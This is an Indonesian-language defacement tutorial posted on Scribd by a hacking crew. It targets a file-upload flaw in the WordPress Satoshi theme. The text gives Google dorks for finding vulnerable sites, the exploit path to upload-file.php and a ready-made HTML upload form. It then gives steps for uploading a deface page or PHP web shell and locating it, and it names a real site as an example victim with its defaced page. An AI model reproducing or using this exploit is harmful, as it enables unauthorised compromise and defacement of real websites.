Scribd
Upload
321 views

Deface

1. This document provides a tutorial on exploiting a CSRF vulnerability in the WordPress Satoshi theme to upload defacement files. 2. It describes dorks to find websites using the vulnerable theme, and provides an example exploit URL to upload files via CSRF without authentication. 3. A sample CSRF HTML file is included to demonstrate uploading a defacement page through the identified vulnerability.

Uploaded by

Anak Baik
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
321 views

Deface

1. This document provides a tutorial on exploiting a CSRF vulnerability in the WordPress Satoshi theme to upload defacement files. 2. It describes dorks to find websites using the vulnerable theme, and provides an example exploit URL to upload files via CSRF without authentication. 3. A sample CSRF HTML file is included to demonstrate uploading a defacement page through the identified vulnerability.

Uploaded by

Anak Baik
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 3

DEFACE POC:

WORDPRESS SATOSHI THEME

MATERI/TUTORIAL BY:
MR.Tyr3X

TEAM:
IndoSec

HEY HO WUZZUP GUYS, KALI INI GW KASIH MATERI DEFACE DENGAN POC
WORDPRESS SATOSHI THEME VULNERABILITY UPLOAD WITH CSRF

EKSTENSI YANG DI SUPPORT:


HTML & PHP

DORK:

-inurl:/wp-content/themes/satoshi/
-intext:Design By Voosh Themes
-inurl:/wp-content/themes/satoshi/
-intext:Design By TecnoGe Informatica

KEMBANGKAN DORK AGAR MENDAPATKAN WEB FRESH


==============================================================

Exploit: contoh.com/wp-content/themes/satoshi/upload-file.php

==============================================================

CSRF

<link href="http://fonts.googleapis.com/css?family=Black+Ops+One|Montserrat|
Cabin+Sketch|Orbitron|Architects+Daughter|Permanent+Marker|Luckiest+Guy|
Cherry+Cream+Soda" rel="stylesheet" />

<center><img src="https://media.giphy.com/media/gHuHATPXBngZfB0pas/giphy.gif"
width="963"/></center>

<html>
<head>
<title>BCA-X666X-TEAM</title>

<center><font COLOR="gold" FACE="Black Ops One" SIZE="6">CSRF BY:


<FONT COLOR="red" FACE="Black Ops One" SIZE="6">MR-X666X</font>

<br>

<font COLOR="red" FACE="Black Ops One" SIZE="5">{[BLACK CODERS


<FONT COLOR="aqua" FACE="Black Ops One" SIZE="5">ANONYMOUS SATANIC
<FONT COLOR="gold" FACE="Black Ops One" SIZE="5"> EXPLOITER TEAM]}</font></center>

<br><br><br>

<center><font COLOR="red" FACE="Iceberg" SIZE="6">___________.::


<FONT COLOR="gold" SIZE="6" FACE="Black Ops One">THANKS TO FOR MY FAMILY
<FONT COLOR="red" SIZE="6" FACE="Iceberg">::.___________</font></center>

<br>
<center><font size="5"><font color="aqua" face="Black Ops One" size="5"><marquee
behavior="scroll" direction="left" scrollamount="10" scrolldelay="5"
width="100%">[+] MILITARY CYBER CODERS |~| MIDNIGHT ATTACKER TEAM |~| BANYUMAS
CYBER TEAM |~| INFINITY CYBER TEAM |~| CYBER TROJAN INDONESIA |~| WHITE EYES
ATTACKER [+] </marquee></center></font>

<body><iframe width="0" height="0" scrolling="no" frameborder="no" allow="autoplay"


src="https://api.soundcloud.com/tracks/597155748/stream?
client_id=a3e059563d7fd3372b49b37f00a00bcf" ></iframe></body>

</head>
<body bgcolor="black">
</body>
</html>

<form enctype="multipart/form-data"
action="http://target.com/wp-content/themes/satoshi/upload-file.php" method="post">
YOUR FILE: <input name="uploadfile" type="file" /><br />
<input type="submit" value="upload" />
</form>

INFORMATION: SAVE CSRF NYA DENGAN EXTENSI HTML


CONTOH: CSRF.HTML
=======================================

STEP BY STEP:

WEB TARGET:
http://wordsmyth.se/

1. DORKING AT GOOGLE

2. PILIH WEB LALU KALIAN MASUKAN EXPLOIT NYA

CONTOH MEMASUKAN EXPLOIT NYA:


https://www.website.com/wp-content/themes/satoshi/upload-file.php

EXPLOITER:
wp-content/themes/satoshi/upload-file.php

INFORMATION:
BILA TAMPILAN BLANK ATAU KOSONG BIASANYA VULN

3. MASUK KE CSRF YANG SUDAH KALIAN SIAPKAN, MASUKAN WEB TARGET KALIAN KE CSRF
BESERTA EXPLOIT NYA, BUKABUKA CSRF KALIAN, LALU UPLOAD SHELL/HTML

4. JIKA BERHASIL MENGUPLOAD MAKA AKAN ADA TULISAN "SUCCESS"

5. CARA MEMANGGIL SCRIPT DEFACE/SHELL NYA SEPERTI INI:

[SCRIPT DEFACE HTML]


https://www.website.com/wp-content/themes/satoshi/images/script.html

[SCRIPT SHELL PHP]


https://www.website.com/wp-content/themes/satoshi/images/script.php

JIKA ADA PATCH NYA, JANGAN LUPA DI SERTAKAN JUGA PATCH NYA, JIKA WEB NYA MEMASANG
PATCH
6. BERHUBUNGAN GW DISINI HANYA UPLOAD SCRIPT DEFACE HTML, JADI GW PAKE CARA MANGGIL
YANG INI
https://www.website.com/wp-content/themes/satoshi/images/script.html

HASIL:
http://wordsmyth.se/wp-content/themes/satoshi/images/!!.html

OKE SEKIAN TERIMA KASIH, SEMOGA BERMANFAAT DAN SEMOGA KALIAN BISA MEMAHAMI

GO TO NOOB > MASTER


LESTGO BUDDY, KEEP SPIRIT AND ALWAYS SMART
#NO_NOOB_NO_MASTER

OKE GOOD BYE GUYS

REGARD:
MR-X666X

TEAM:
BLACK CODERS ANONYMOUS SATANIC EXPLOITER

You might also like